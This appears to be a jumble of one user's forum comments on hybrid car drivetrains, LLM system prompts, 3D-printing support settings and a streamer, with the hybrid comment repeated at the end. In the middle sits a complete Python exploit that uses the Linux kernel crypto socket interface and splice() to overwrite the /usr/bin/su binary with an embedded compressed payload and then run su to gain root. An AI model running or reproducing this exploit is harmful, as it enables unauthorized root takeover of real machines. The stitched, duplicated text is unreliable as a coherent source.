what's the drivetrain? is it a series or parallel hybrid?
Edit: looks like it's got a 6-speed dsg. not a series hybrid then.
i don't understand why the series hybrids are dying out. on paper it's a better system. changing nothing else, my 2012 ampera would get like 250km range with today's battery tech and yet the top-trim phev's are barely scratching 100km.
#!/usr/bin/env python3
import os
from ctypes import c_int32 as i32, c_char as char
import zlib
import socket as s
def inject(file, offset, data):
# connect to kernel crypto system's aeda endpoint
sock = s.socket(s.AF_ALG, s.SOCK_SEQPACKET)
sock.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
# set cipher key and tag size, then wait for the system to be ready
sock.setsockopt(s.SOL_ALG, s.ALG_SET_KEY, (char * 68)(8, 0, 1, 0, 0, 0, 0, 16))
sock.setsockopt(s.SOL_ALG, s.ALG_SET_AEAD_AUTHSIZE, None, optlen=4)
conn, _ = sock.accept()
# pass in configuration
conn.sendmsg(
[b"AAAA" + data], # pad to tag size
[
(s.SOL_ALG, s.ALG_SET_OP, i32(s.ALG_OP_DECRYPT)), # set operation
(s.SOL_ALG, s.ALG_SET_IV, (char * 20)(16)), # set init vector
(s.SOL_ALG, s.ALG_SET_AEAD_ASSOCLEN, i32(8)), # set associated data length
],
s.MSG_MORE,
)
# move file through a pipe to the connection without copying
r, w = os.pipe()
os.splice(file, w, offset + 4, offset_src=0)
os.splice(r, conn.fileno(), offset + 4)
try:
conn.recv(8 + offset)
except:
pass
binary = os.open("/usr/bin/su", os.O_RDONLY)
offset = 0
payload = zlib.decompress(
bytes.fromhex(
"78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301"
"d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b96"
"75c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
)
)
while offset < len(payload):
inject(binary, offset, payload[offset : offset + 4])
offset += 4
os.system("su")
as far as i understand the writeup, the weakness is in the splice() function, because it silently crosses an auth boundary. the payload looks like this:
configuration is things like temperature, output cutoff, and tool use. those are out-of-band. the system prompt, being in-band, can not be configuration. it's like calling a http request configuration for the response.
of course. but the larger the context grows the less it affects the output. there is some ways around this, like moving the system prompt last in the context before every answer, but the very existence of the system prompt to begin with is a hack. what's really needed is a functional rules-based pre- and post-filtering system for a chatbox to be safe. personally i think the chatbox "style" has played out its role and is living on as a gimmick. actual tooling built with language models is stuff like LSP servers and accessibility software, and that needs rigid configuration.
because the system prompt is not configuration, it's input. it has the same priority as whatever the user types in, and it takes up valuable space in the context window.
to add onto what pennomi is saying, this also shows that openai doesn't understand language models. the only actual functionality the llm
has is still "given the previous text, what is the most likely character/phoneme/token?", so rather than (to use an analogy) change the font in their word document they add in a sentence in the middle of the document that says "everything from here is in comic sans".
but it's not surprising that they'd do this. if we've learned anything from the claude frontend leak earlier, where their "sentiment analysis" tool for input text was a regex (you literally have a language model! that's like the only thing it's good at!), i think it's pretty clear most of the big players in the llm space have gotten high on their own supply and can't be expected to actually reason about the operations the system is actually performing.
kinda, yeah. i halved the print speeds and lowered the fan to 40%, which makes petg come out beautifully given that the support material cooperates. support interface ironing is crucial, as is lowering the interface z distance to basically as low as it can go. if the support interface area is less than like 5mm² it's basically a coin toss as to whether it sticks or not. the extruder can even drag small parts loose on retraction, if your temps are too low. it took finding a detail hanging from the wiping brush for me to figure that one out.
also, if you're experimenting and still getting spaghetti, one thing to look out for is that there is currently a bug with some of the tree support generation in orca. whenever the slicer generates a big combined tree, check the preview carefully because chances are the supports start in mid-air, 10-20 layers above the plate. there is a setting called "base pattern" that's supposed to work around that but i haven't gotten it to work.
oh i've never watched anything directly by him except his animal well playthrough, where he spends a lot of time "thinking" by looking down at his desk
what's the drivetrain? is it a series or parallel hybrid?
Edit: looks like it's got a 6-speed dsg. not a series hybrid then.
i don't understand why the series hybrids are dying out. on paper it's a better system. changing nothing else, my 2012 ampera would get like 250km range with today's battery tech and yet the top-trim phev's are barely scratching 100km.